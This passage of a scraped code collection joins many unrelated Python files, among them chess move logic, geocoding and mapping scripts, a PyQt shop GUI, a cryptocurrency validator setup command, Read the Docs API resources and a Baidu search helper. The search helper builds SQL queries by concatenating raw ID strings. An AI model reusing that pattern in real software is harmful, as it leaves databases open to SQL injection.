\"\"\"\n data = {}\n atlas_names = _check_atlases(atlas_names)\n for atlas_name in atlas_names:\n if atlas_name == 'harvard_oxford':\n name = 'cort-maxprob-thr25-2mm'\n data[atlas_name] = datasets.fetch_atlas_harvard_oxford(name)\n elif atlas_name == 'destrieux':\n data[atlas_name] = datasets.fetch_atlas_destrieux_2009()\n elif atlas_name == 'diedrichsen':\n data[atlas_name] = _fetch_atlas_diedrichsen('maxprob-thr25-2mm')\n elif atlas_name == 'juelich':\n data[atlas_name] = _fetch_atlas_juelich('maxprob-thr25-2mm')\n elif atlas_name == 'jhu':\n data[atlas_name] = _fetch_atlas_jhu('labels-2mm')\n elif atlas_name == 'mist':\n data[atlas_name] = fetch_mist()\n else:\n raise ValueError(\"Not a valid atlas. Given atlas is exhausted\")\n return data\n","sub_path":"region_labeling/atlas.py","file_name":"atlas.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"583308471","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport pandas as pd\n\ndf = pd.read_csv('../../data/frog_tongue_adhesion.csv', comment='#')\n\ndf = df.rename(columns={'impact force (mN)': 'impf'})\n\ngb_frog = df.groupby('ID')\nmean_impf = gb_frog['impf'].mean()\nsem_impf = gb_frog['impf'].sem()\n\n# don't use\nsns.barplot(data=df, x='ID', y='impf')\n\nplt.figure()\nsns.boxplot(data=df, x='ID', y='impf')\n\nplt.figure()\n# keep an eye on \"AltAir\" or something like that. another plotting library.\n# sns.swarmplot(data=df, x='ID', y='impf')\n\n# could also consider overlaying this over box plot\nsns.swarmplot(data=df, x='ID', y='impf', hue='date')\nplt.show()\nplt.gca().legend_.remove()\n\n","sub_path":"created/4/l1.py","file_name":"l1.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"473790382","text":"import numpy as np\nimport functions\n\ndef getAllowedMovesForPiece(player,piece,piecePosition_i,chessBoard,onlyCaptureMoves,debug=False):\n allowedMoves=[]\n delta=getBasicMoves(piece,piecePosition_i,onlyCaptureMoves,debug)\n if(debug): print(\"DEBUG (moves (getAllowedMovesForPiece)): piece=\",piece)\n for Delta in delta:\n validMove=True\n captureMove=False\n for i in range(1,8):\n if validMove==True and captureMove==False:\n Del=[d*i for d in Delta]\n if(debug): print(\"DEBUG (moves (getAllowedMovesForPiece)): Del=\",Del)\n newPos,validMove,captureMove=checkMove(player,piece,piecePosition_i,Del,chessBoard,debug)\n if(validMove==True):\n if(piece==\"pawn\" and piecePosition_i[1]==6 and newPos[1]==7):\n allowedMoves.append([piece,\"knight\",piecePosition_i,newPos,captureMove,[False,False],False]) # [piece before, piece after, pos before, pos after, captured?, castle?, enPassant?]\n allowedMoves.append([piece,\"bishop\",piecePosition_i,newPos,captureMove,[False,False],False])\n allowedMoves.append([piece,\"rook\" ,piecePosition_i,newPos,captureMove,[False,False],False])\n allowedMoves.append([piece,\"queen\" ,piecePosition_i,newPos,captureMove,[False,False],False])\n else:\n allowedMoves.append([piece,piece,piecePosition_i,newPos,captureMove,[False,False],False])\n if(piece==\"pawn\" or piece==\"knight\" or piece==\"king\"):\n break\n else:\n break\n else:\n break\n if(debug): print(\"DEBUG (moves (getAllowedMovesForPiece)): AllowedMoves=\",allowedMoves)\n return allowedMoves\n\ndef getBasicMoves(piece,piecePosition_i,onlyCaptureMoves,debug=False):\n delta=[]\n if piece==\"pawn\":\n delta=[[1,1],[-1,1]]\n if(piecePosition_i[1]==1 and onlyCaptureMoves==False):\n delta.append([0,1])\n delta.append([0,2])\n elif(onlyCaptureMoves==False):\n delta.append([0,1])\n elif(piece==\"knight\"):delta=[[1,2],[-1,2],[1,-2],[-1,-2],[2,1],[-2,1],[2,-1],[-2,-1]]\n elif(piece==\"bishop\"):delta=[[1,1],[-1,1],[1,-1],[-1,-1]]\n elif(piece==\"rook\") :delta=[[1,0],[-1,0],[0,1],[0,-1]]\n elif(piece==\"queen\" or piece==\"king\"): delta=[[1,1],[-1,1],[1,-1],[-1,-1],[1,0],[-1,0],[0,1],[0,-1]]\n else:print(\"(ERROR (moves (getBasicMoves)): Piece unknown!\")\n return delta\n\ndef checkMove(player,piece,piecePosition_i,delt,chessBoard,debug=False):\n playerColor= functions.getPlayerColor(player)\n opponentColor=functions.getPlayerColor(functions.getOpponent(player))\n validMove=False\n captureMove=False\n returnArray=[]\n newPos=np.add(piecePosition_i,delt).tolist()\n if(debug): print(\"DEBUG (moves (checkMove)): piece,piecePosition_i,delt,newPos=\",piece,piecePosition_i,delt,newPos)\n if(newPos[0]<0 or newPos[0]>7 or newPos[1]<0 or newPos[1]>7 or (playerColor in chessBoard[newPos[1]][newPos[0]])):\n if(debug): print(\"DEBUG (moves (checkMove)): Newpos=\",newPos,\"for\",piece,\"is invalid!\")\n returnArray=[newPos,False,False] #newPos,validMove,captureMove\n else:\n if piece!=\"pawn\":\n if(opponentColor in chessBoard[newPos[1]][newPos[0]]):\n returnArray=[newPos,True,True]\n else:\n returnArray=[newPos,True,False]\n elif piece==\"pawn\":\n if(delt==[0,1]): # normal move\n if(chessBoard[newPos[1]][newPos[0]]==\" \"):\n returnArray=[newPos,True,False]\n else:\n returnArray=[newPos,False,False]\n elif(delt==[0,2]): # normal move (Check also in-between position)\n inBetweenPos=np.add(piecePosition_i,[0,1]).tolist()\n if(chessBoard[inBetweenPos[1]][inBetweenPos[0]]==\" \" and chessBoard[newPos[1]][newPos[0]]==\" \"):\n returnArray=[newPos,True,False]\n else:\n returnArray=[newPos,False,False]\n elif(delt==[1,1] or delt==[-1,1]): # capture move\n if(opponentColor in chessBoard[newPos[1]][newPos[0]]):\n returnArray=[newPos,True,True]\n else:\n returnArray=[newPos,False,False]\n else:\n print(\"ERROR (moves (checkMove)): Player\",player,\"'s pawn move from piecePosition_i=\",piecePosition_i,\"with delt=\",delt,\"is neither normal nor capture move! => move not allowed!\")\n else:\n returnArray=[newPos,False,False]\n return returnArray[0],returnArray[1],returnArray[2]\n","sub_path":"playingCodePreviousVersions/PlayingCode_1_1/moves.py","file_name":"moves.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"407331908","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport googlemaps\n\n\n# In[2]:\n\n\nmurders = pd.read_csv(\"C:/Users/Kyle Haberman/Documents/pamurders.csv\")\n\n\n# In[3]:\n\n\ncities = murders[\"City\"]\ncities = pd.DataFrame(cities)\n\n\n# In[4]:\n\n\ngmaps_key = googlemaps.Client(key = \"\") #api key\n\n\n# In[5]:\n\n\ncities[\"LAT\"] = None\ncities[\"LON\"] = None\n\n\n# In[6]:\n\n\nfor i in range(0, len(cities), 1):\n geocode_result = gmaps_key.geocode(cities.iat[i,0])\n try: \n lat = geocode_result[0][\"geometry\"][\"location\"][\"lat\"]\n lon = geocode_result[0][\"geometry\"][\"location\"][\"lng\"]\n cities.iat[i, cities.columns.get_loc(\"LAT\")] = lat\n cities.iat[i, cities.columns.get_loc(\"LON\")] = lon\n except:\n lat = None\n lon = None\n \ncities\n\n\n# In[7]:\n\n\ncities['Murders'] = murders['Murders']\ncities['Murders/100K'] = murders['Murders/100K']\ncities\n\n\n# In[8]:\n\n\nlocations = cities[['LAT', 'LON']]\nlocationlist = locations.values.tolist()\nlen(locationlist)\nlocationlist[7]\n\n\n# In[9]:\n\n\nimport folium\n\nm = folium.Map(location=[41, -77.5], tiles='cartodbpositron',\n zoom_start=7, control_scale=True)\nfor point in range(0, len(locationlist)):\n folium.CircleMarker(locationlist[point], popup=cities['City'][point], radius=int(cities.iloc[point]['Murders'])/11,\n color=\"red\", fill=True).add_to(m)\nm\n\n","sub_path":"geolocation.py","file_name":"geolocation.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"529123726","text":"import code_writer\nimport vm_parser\n\n\ndef main(vm):\n line_num = 0\n asm = ''\n vm_lines = vm_parser.strip(vm) #strip comments and whitespace\n for line in vm_lines:\n commands = line.split() #separate commands, remove whitespace\n if len(commands) == 1: #arithmetic operation\n asm = asm + code_writer.writeArithmetic(commands[0], line_num)\n else: #pushpop\n asm = asm + code_writer.writePushPop(commands)\n line_num = line_num+1 \n return asm + code_writer.end_loop()\n\nif __name__ == \"__main__\":\n file_in = open(r\"StackArithmetic\\SimpleAdd\\SimpleAdd.vm\", \"r\")\n convert = main(file_in)\n out = open(\"StackArithmetic\\SimpleAdd\\simpleAdd.asm\", \"w\")\n out.write(convert)\n file_in = open(r\"StackArithmetic\\StackTest\\StackTest.vm\", \"r\")\n convert = main(file_in)\n out = open(\"StackArithmetic\\StackTest\\StackTest.asm\", \"w\")\n out.write(convert)\n file_in = open(r\"MemoryAccess\\BasicTest\\BasicTest.vm\", \"r\")\n convert = main(file_in)\n out = open(\"MemoryAccess\\BasicTest\\BasicTest.asm\", \"w\")\n out.write(convert)\n file_in = open(r\"MemoryAccess\\PointerTest\\PointerTest.vm\", \"r\")\n convert = main(file_in)\n out = open(\"MemoryAccess\\PointerTest\\PointerTest.asm\", \"w\")\n out.write(convert)\n file_in = open(r\"MemoryAccess\\StaticTest\\StaticTest.vm\", \"r\")\n convert = main(file_in)\n out = open(\"MemoryAccess\\StaticTest\\StaticTest.asm\", \"w\")\n out.write(convert)","sub_path":"07/vm_translator.py","file_name":"vm_translator.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"171742416","text":"from PyQt4 import QtCore, QtGui\r\nimport sys #bll main buttons\r\nimport sqlite3\r\nimport os\r\n\r\n\r\nfullpath=os.path.join(os.pardir,'DAL')\r\nsys.path.append(fullpath)\r\nfrom searchdatabase import Search\r\n\r\nclass ButtonControl(object):\r\n def loadData():\r\n data,connection,cursor=Search.loadDatabase()\r\n return (data, connection, cursor)\r\n def searchButton(search=None):\r\n result, connection, cursor =Search.searchDatabase(search)\r\n return (result, connection, cursor)\r\n def aboutButton():\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"Online flowershop service\")\r\n msg.setInformativeText(\" Coe125-C1 \\n\\n Created by:\\n Aquino, Mark\\n Chua, Cyrille Lan\\n Hubalde,Angelo \\n Martinez, Rain\") \r\n msg.setWindowTitle(\"About\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok)\r\n \r\n\t\r\n retval = msg.exec_()\r\n def helpButton():\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"Instructions\")\r\n msg.setInformativeText( '-To see all of the available items, use the \"load\" button. \\n-Use the < and > buttons to get or remove items from the cart. \\n-A \"search\" button is available to look for specific items.\\n-Use the \"reset\" button to quickly empty the cart. \\n-Use the \"purchase\" button to confirm your purchase.') \r\n msg.setWindowTitle(\"Help\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok)\r\n \r\n \r\n\t\r\n retval = msg.exec_()\r\n \r\n def purchaseButton(price,userID,itemID):\r\n Search.insertDatabase(price,userID,itemID)\r\n\r\n\r\n \r\n\r\n def checkCart(empty,price,userID,itemID):\r\n if empty==True:\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"There must be at least a single item in the cart first.\")\r\n \r\n msg.setWindowTitle(\"Error\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok)\r\n \r\n\t\r\n retval = msg.exec_()\r\n else :\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"Are you done purchasing?\")\r\n \r\n msg.setWindowTitle(\"Confirmation\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel)\r\n \r\n\t\r\n retval = msg.exec_()\r\n print(retval)\r\n if retval==1024:\r\n ButtonControl.purchaseButton(price,userID,itemID)\r\n return False\r\n return True\r\n def itemID(item,quantity):\r\n itemID=Search.getItemID(item)\r\n Search.updateItem(item,quantity)\r\n itemID=itemID+\",\"+quantity+\":\"\r\n return itemID\r\n \r\n def lessThanError(value):\r\n if value==1:\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"There are currently no available stock of this item.\")\r\n \r\n msg.setWindowTitle(\"Error\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok)\r\n \r\n\t\r\n msg.exec_()\r\n\r\n\r\n else:\r\n msg = QtGui.QMessageBox()\r\n msg.setIcon(QtGui.QMessageBox.Information)\r\n\r\n msg.setText(\"You cannot exceed the amount available in the stock.\")\r\n \r\n msg.setWindowTitle(\"Error\")\r\n \r\n msg.setStandardButtons(QtGui.QMessageBox.Ok)\r\n \r\n\t\r\n msg.exec_()\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"Source_code/BLL/mainButtonControl.py","file_name":"mainButtonControl.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"642529610","text":"import json\nimport logging\nimport os\nfrom pathlib import Path\nfrom urllib.request import Request, urlopen\n\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import URLValidator\nfrom django.db.models import Q\nfrom thenewboston.base_classes.initialize_node import InitializeNode\nfrom thenewboston.constants.network import (\n BLOCK_IDENTIFIER_LENGTH,\n CONFIRMATION_VALIDATOR,\n HEAD_HASH_LENGTH,\n PRIMARY_VALIDATOR\n)\nfrom thenewboston.utils.files import get_file_hash, read_json, write_json\n\nfrom v1.accounts.models.account import Account\nfrom v1.cache_tools.helpers import rebuild_cache\nfrom v1.self_configurations.models.self_configuration import SelfConfiguration\nfrom v1.validators.models.validator import Validator\n\n\"\"\"\npython3 manage.py initialize_validator\n\nPrerequisites:\n- python3 manage.py makemigrations\n- python3 manage.py migrate\n- python3 manage.py createsuperuser (optional)\n\nRunning this script will:\n- delete existing SelfConfiguration and related Validator objects\n- create SelfConfiguration and related Validator objects\n- create Account objects based on downloaded root_account_file\n- rebuild cache\n\"\"\"\n\nLOCAL_ROOT_ACCOUNT_FILE_PATH = os.path.join(settings.TMP_DIR, 'root_account_file.json')\n\nlogger = logging.getLogger('thenewboston')\n\n\nclass Command(InitializeNode):\n help = 'Initialize validator'\n\n def __init__(self):\n super().__init__()\n\n self.required_input = {\n 'account_number': None,\n 'default_transaction_fee': None,\n 'head_block_hash': None,\n 'ip_address': None,\n 'node_identifier': None,\n 'node_type': None,\n 'port': None,\n 'protocol': None,\n 'root_account_file': None,\n 'root_account_file_hash': None,\n 'seed_block_identifier': None,\n 'version': None\n }\n\n @staticmethod\n def download_root_account_file(*, url, destination_file_path):\n \"\"\"\n Download root account JSON file and save\n \"\"\"\n\n print('Downloading file...')\n request = Request(url)\n response = urlopen(request)\n results = json.loads(response.read())\n write_json(destination_file_path, results)\n\n def get_head_block_hash(self):\n \"\"\"\n Get head block hash\n \"\"\"\n\n if not self.required_input['seed_block_identifier']:\n return\n\n valid = False\n\n while not valid:\n head_block_hash = input('Enter head_block_hash: ')\n\n if not head_block_hash:\n break\n\n if len(head_block_hash) != HEAD_HASH_LENGTH:\n self._error(f'head_block_hash must be {HEAD_HASH_LENGTH} characters long')\n continue\n\n self.required_input['head_block_hash'] = head_block_hash\n valid = True\n\n def get_node_type(self):\n \"\"\"\n Get node type\n \"\"\"\n\n valid = False\n\n while not valid:\n node_type = input('Enter node_type (required): ')\n\n if not node_type:\n continue\n\n if node_type not in [CONFIRMATION_VALIDATOR, PRIMARY_VALIDATOR]:\n self._error(f'node_type must be one of {CONFIRMATION_VALIDATOR} or {PRIMARY_VALIDATOR}')\n continue\n\n self.required_input['node_type'] = node_type\n valid = True\n\n def get_root_account_file(self):\n \"\"\"\n Get root account file from user\n \"\"\"\n\n valid = False\n\n while not valid:\n root_account_file = input('Enter root account file URL (required): ')\n\n if not root_account_file:\n self._error('root_account_file required')\n continue\n\n try:\n url_validator = URLValidator(schemes=['http', 'https'])\n url_validator(root_account_file)\n except ValidationError:\n self._error('Invalid URL')\n continue\n\n if Path(root_account_file).suffix != '.json':\n self._error('JSON file required')\n continue\n\n try:\n self.download_root_account_file(\n url=root_account_file,\n destination_file_path=LOCAL_ROOT_ACCOUNT_FILE_PATH\n )\n except Exception as e:\n logger.exception(e)\n self.stdout.write(self.style.ERROR(f'Error downloading {root_account_file}'))\n self.stdout.write(self.style.ERROR(e))\n\n file_hash = get_file_hash(LOCAL_ROOT_ACCOUNT_FILE_PATH)\n\n if not self.required_input['head_block_hash']:\n self.required_input['head_block_hash'] = file_hash\n\n self.required_input.update({\n 'root_account_file': root_account_file,\n 'root_account_file_hash': file_hash\n })\n valid = True\n\n def get_seed_block_identifier(self):\n \"\"\"\n Get seed block identifier from user\n \"\"\"\n\n valid = False\n\n while not valid:\n seed_block_identifier = input('Enter seed block identifier: ')\n\n if not seed_block_identifier:\n self.required_input['seed_block_identifier'] = ''\n break\n\n if len(seed_block_identifier) != BLOCK_IDENTIFIER_LENGTH:\n self._error(\n f'Invalid character length for seed_block_identifier\\n\\n'\n f'Enter a {BLOCK_IDENTIFIER_LENGTH} character value when branching from an existing network\\n'\n f'- recommended\\n'\n f'- set value to the identifier of the last block used when root_account_file was generated\\n\\n'\n f'Enter nothing if initializing a test network\\n'\n f'- not recommended\\n'\n f'- used for development'\n )\n continue\n\n self.required_input['seed_block_identifier'] = seed_block_identifier\n valid = True\n\n def handle(self, *args, **options):\n \"\"\"\n Run script\n \"\"\"\n\n # Input values\n self.get_verify_key(\n attribute_name='node_identifier',\n human_readable_name='node identifier'\n )\n self.get_verify_key(\n attribute_name='account_number',\n human_readable_name='account number'\n )\n self.get_fee(\n attribute_name='default_transaction_fee',\n human_readable_name='default transaction fee'\n )\n self.get_node_type()\n self.get_seed_block_identifier()\n self.get_head_block_hash()\n self.get_root_account_file()\n self.get_protocol()\n self.get_ip_address()\n self.get_port()\n self.get_version_number()\n\n self.initialize_validator()\n\n def initialize_validator(self):\n \"\"\"\n Process to initialize validator:\n - delete existing SelfConfiguration and related Validator objects\n - create SelfConfiguration and related Validator objects\n - create Account objects based on downloaded root_account_file\n - rebuild cache\n \"\"\"\n\n head_block_hash = self.required_input.pop('head_block_hash')\n node_type = self.required_input.pop('node_type')\n\n # Delete existing SelfConfiguration and related Validator objects\n SelfConfiguration.objects.all().delete()\n Validator.objects.filter(\n Q(ip_address=self.required_input['ip_address']) |\n Q(node_identifier=self.required_input['node_identifier'])\n ).delete()\n\n # Create SelfConfiguration and related Validator objects\n SelfConfiguration.objects.create(\n **self.required_input,\n node_type=node_type\n )\n self.update_accounts_table()\n\n # Rebuild cache\n rebuild_cache(head_block_hash=head_block_hash)\n\n self.stdout.write(self.style.SUCCESS('Validator initialization complete'))\n\n @staticmethod\n def update_accounts_table():\n \"\"\"\n Create Account objects\n \"\"\"\n\n Account.objects.all().delete()\n account_data = read_json(LOCAL_ROOT_ACCOUNT_FILE_PATH)\n accounts = [\n Account(\n account_number=k,\n balance=v['balance'],\n balance_lock=v['balance_lock']\n ) for k, v in account_data.items()\n ]\n Account.objects.bulk_create(accounts)\n","sub_path":"v1/self_configurations/management/commands/initialize_validator.py","file_name":"initialize_validator.py","file_ext":"py","file_size_in_byte":8527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"284897248","text":"# -*- coding: utf8 -*-\nfrom application.cosinescore import *\n\n\ndef search_baike_list(key_word, N=10):\n \"\"\"\n description: 通关关键字搜索百度百科,返回简略信息\n :param key_word: 关键词\n :param N: 返回条目个数\n :return: return_list: 结果列表,每个元素是一个tuple,tuple的第一个元素是title,\n 第二个元素是描述\n \"\"\"\n doc_id_dict = search(key_word, region=1) # 返回值为字典类型\n if doc_id_dict == None:\n return None\n # result是个list, 每个元素是一个tuple\n results = sorted(doc_id_dict.items(), key=lambda d: d[1], reverse=True) # 先返回10个,后续分页明天说\n\n result_list = []\n for doc_tuple in results: # doc_tuple: (doc_id, 相似度值)\n try:\n cursor.execute('select title, description from baike_title_description where id = ' + doc_tuple[0])\n tmp = list(cursor.fetchone()) # tuple类型\n tmp.append(doc_tuple[0])\n result_list.append(tmp)\n except:\n print(\"===============DataBase error!============\")\n return\n return result_list\n\n\ndef search_question_list(key_word, N=10):\n \"\"\"\n description: 通过关键字搜索百度知道的问题,返回简略信息\n :param key_word: 关键字\n :param N: 返回问题的个数\n :return:\n \"\"\"\n doc_id_dict = search(key_word, region=3)\n if doc_id_dict == None:\n return None\n result_list = []\n results = sorted(doc_id_dict.items(), key=lambda d: d[1], reverse=True)\n for doc_tuple in results: # doc_tuple: (doc_id, 相似度值)\n try:\n cursor.execute('select title from baiduzhidao where doc_id=' + doc_tuple[0])\n question = cursor.fetchone()\n cursor.execute('select count(*) from baiduzhidao where doc_id=' + doc_tuple[0])\n num_answers = cursor.fetchone()\n result_list.append((question[0], num_answers[0], doc_tuple[0]))\n except:\n print(\"===============DataBase error!============\")\n return result_list\n\n\ndef search_answer_list(key_word, N=10):\n \"\"\"\n description: 通过关键字搜索百度知道的答案,返回简略信息\n :param key_word: 关键字\n :param N: 返回问题的个数\n :return:\n \"\"\"\n doc_id_dict = search(key_word, region=4)\n if doc_id_dict == None:\n return None\n result_list = []\n results = sorted(doc_id_dict.items(), key=lambda d: d[1], reverse=True)\n for doc_tuple in results: # doc_tuple: (doc_id, 相似度值)\n try:\n cursor.execute('select title, content from baiduzhidao where id=' + doc_tuple[0])\n tmp = list(cursor.fetchone())\n # 因为是显示在列表中,所以必须控制回答的字数\n if len(tmp[1]) > 50:\n tmp[1] = tmp[1][0:50]\n tmp.append(doc_tuple[0])\n result_list.append(tmp)\n except:\n print(\"===============DataBase error!============\")\n return result_list\n\n\ndef search_imaege_list(key_word):\n \"\"\"\n description: 通关关键字搜索图片,PS: 实际只在百度百科里面搜索\n :param key_word:\n :return: 图片的url列表\n \"\"\"\n doc_id_dict = search(key_word, region=1) # 在百科数据里面搜索\n if doc_id_dict is None:\n return None\n # results是个list,每个元素是个tuple---(doc_id, 对应的分数)\n results = sorted(doc_id_dict.items(), key=lambda d: d[1], reverse=True)\n\n result_list = []\n try:\n for doc_id_tuple in results:\n cursor.execute('select title from baike_title_description where id = ' + doc_id_tuple[0])\n title = cursor.fetchone()[0]\n cursor.execute('select description from baike_subtitle_description where subtitle like \"%img%\"and title_id = ' + doc_id_tuple[0])\n image_list = list(cursor.fetchall())\n for image in image_list:\n result_list.append((image[0], title))\n except:\n print(\"===============DataBase error!============\")\n return result_list\n\ndef search_detail_entry(doc_id, image_flag=True):\n \"\"\"\n description: 通过doc_id搜索百科一个条目的详细信息,包括标题和所有子标题以及对应的描述\n :param doc_id:\n :param image_flag:\n :return:\n \"\"\"\n\n entry_info = {}\n try:\n cursor.execute('select title, description from baike_title_description where id = ' + doc_id)\n tmp = cursor.fetchone() # tuple类型\n entry_info['title'] = tmp[0]\n entry_info['description'] = tmp[1]\n cursor.execute('select subtitle, description from baike_subtitle_description where title_id = ' + doc_id)\n tmp = cursor.fetchall() # tuple类型\n entry_info['subInfo'] = tmp\n\n except:\n print(\"===============DataBase error!============\")\n return entry_info\n\n\ndef search_detail_quesiton(doc_id, id_type=0):\n \"\"\"\n description: 通过doc_id搜索知道一个问题的详细信息,包括问题描述和所有的回答,以及该回答的点赞数\n :param doc_id:\n :return:\n \"\"\"\n question_info = None\n try:\n if id_type =='1':\n cursor.execute('select doc_id from baiduzhidao where id = ' + doc_id)\n doc_id = str(cursor.fetchone()[0])\n\n cursor.execute('select title, content, agree, disagree from baiduzhidao where doc_id = ' + doc_id)\n tmp = cursor.fetchall() # tuple类型\n question_info = tmp\n print(len(question_info[1]))\n except:\n print(\"===============DataBase error!============\")\n return question_info\n\n\nif __name__ == '__main__':\n # print(len(search_baike_list('爱因斯坦')))\n # print(search_zhidao_question(\"居里夫人\"))\n # print(search_answer_list(\"居里夫人\"))\n # search_detail_entry(doc_id='51')\n # search_detail_quesiton(doc_id=\"20\")\n print(search_imaege_list(\"爱因斯坦\")[0:10])","sub_path":"application/search_util.py","file_name":"search_util.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"362837373","text":"import numpy as np\n\ndef check_city_status(status, city_index):\n if city_index not in status:\n return True\n else:\n return False\n\ndef greedy_opt(num_cities, dists):\n status = list([-1]) * num_cities\n status[0] = np.random.randint(0, num_cities)\n now_city = status[0]\n\n for index_route in range(1, num_cities):\n min_dist = 1e20\n for next_city in range(0, num_cities):\n if((next_city!=now_city) and check_city_status(status, next_city) and (dists[next_city, now_city]%s)/schema/$' % self._meta.resource_name,\n self.wrap_view('get_schema'),\n name='api_get_schema',\n ),\n url(\n r'^(?P%s)/search%s$' %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('get_search'),\n name='api_get_search',\n ),\n url(\n (r'^(?P%s)/(?P[a-z-_]+)/$') % self._meta.resource_name,\n self.wrap_view('dispatch_detail'),\n name='api_dispatch_detail',\n ),\n ]\n\n\nclass VersionResource(ModelResource):\n\n \"\"\"API resource for Version model.\"\"\"\n\n project = fields.ForeignKey(ProjectResource, 'project', full=True)\n\n class Meta:\n allowed_methods = ['get', 'put', 'post']\n always_return_data = True\n queryset = Version.objects.api()\n authentication = PostAuthentication()\n authorization = DjangoAuthorization()\n filtering = {\n 'project': ALL_WITH_RELATIONS,\n 'slug': ALL_WITH_RELATIONS,\n 'active': ALL,\n }\n\n def get_object_list(self, request):\n self._meta.queryset = Version.objects.api(user=request.user)\n return super().get_object_list(request)\n\n def build_version(self, request, **kwargs):\n project = get_object_or_404(Project, slug=kwargs['project_slug'])\n version = kwargs.get('version_slug', LATEST)\n version_obj = project.versions.get(slug=version)\n trigger_build(project=project, version=version_obj)\n return self.create_response(request, {'building': True})\n\n def prepend_urls(self):\n return [\n url(\n r'^(?P%s)/schema/$' % self._meta.resource_name,\n self.wrap_view('get_schema'),\n name='api_get_schema',\n ),\n url(\n r'^(?P%s)/(?P[a-z-_]+[a-z0-9-_]+)/$' # noqa\n % self._meta.resource_name,\n self.wrap_view('dispatch_list'),\n name='api_version_list',\n ),\n url(\n (\n r'^(?P%s)/(?P[a-z-_]+[a-z0-9-_]+)/(?P'\n r'[a-z0-9-_.]+)/build/$'\n ) % self._meta.resource_name,\n self.wrap_view('build_version'),\n name='api_version_build_slug',\n ),\n ]\n\n\nclass FileResource(ModelResource):\n\n \"\"\"API resource for ImportedFile model.\"\"\"\n\n project = fields.ForeignKey(ProjectResource, 'project', full=True)\n\n class Meta:\n allowed_methods = ['get', 'post']\n queryset = ImportedFile.objects.all()\n excludes = ['md5', 'slug']\n include_absolute_url = True\n authentication = PostAuthentication()\n authorization = DjangoAuthorization()\n\n def prepend_urls(self):\n return [\n url(\n r'^(?P%s)/schema/$' % self._meta.resource_name,\n self.wrap_view('get_schema'),\n name='api_get_schema',\n ),\n url(\n r'^(?P%s)/anchor%s$' %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('get_anchor'),\n name='api_get_anchor',\n ),\n ]\n\n def get_anchor(self, request, **__):\n self.method_check(request, allowed=['get'])\n self.is_authenticated(request)\n self.throttle_check(request)\n\n query = request.GET.get('q', '')\n try:\n redis_client = cache.get_client(None)\n redis_data = redis_client.keys('*redirects:v4*%s*' % query)\n except (AttributeError, redis.exceptions.ConnectionError):\n redis_data = []\n # -2 because http:\n urls = [\n ''.join(data.split(':')[6:]) for data in redis_data\n if 'http://' in data\n ]\n object_list = {'objects': urls}\n\n self.log_throttled_access(request)\n return self.create_response(request, object_list)\n\n\nclass UserResource(ModelResource):\n\n \"\"\"Read-only API resource for User model.\"\"\"\n\n class Meta:\n allowed_methods = ['get']\n queryset = User.objects.all()\n fields = ['username', 'id']\n filtering = {\n 'username': 'exact',\n }\n\n def prepend_urls(self):\n return [\n url(\n r'^(?P%s)/schema/$' % self._meta.resource_name,\n self.wrap_view('get_schema'),\n name='api_get_schema',\n ),\n url(\n r'^(?P%s)/(?P[a-z-_]+)/$' % self._meta.resource_name,\n self.wrap_view('dispatch_detail'),\n name='api_dispatch_detail',\n ),\n ]\n","sub_path":"readthedocs/api/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"149135163","text":"spam = ['apples', 'bananas', 'tofu', 'cats']\r\n\r\ndef addAnd(words):\r\n s = \"\"\r\n for i in range(len(words)-1):\r\n s += (words[i] + ', ')\r\n s += ('and ' + words[-1])\r\n return s\r\n\r\nprint(spam)\r\nprint(addAnd(spam))","sub_path":"CommaCode.py","file_name":"CommaCode.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"220295067","text":"import numpy as np\nimport random\nimport copy\n\nclass svm:\n\n def __init__(self, numInputs, learningRate=0.01, regularization = 1, epochs=10):\n random.seed(1)\n self.epochs = epochs\n self.learningRate = learningRate\n self.initLearningRate = learningRate\n self.regularization = regularization\n self.weights = np.array([random.uniform(-0.01, 0.01) for _ in range(numInputs)])\n\n\n def predict(self, inputs):\n return 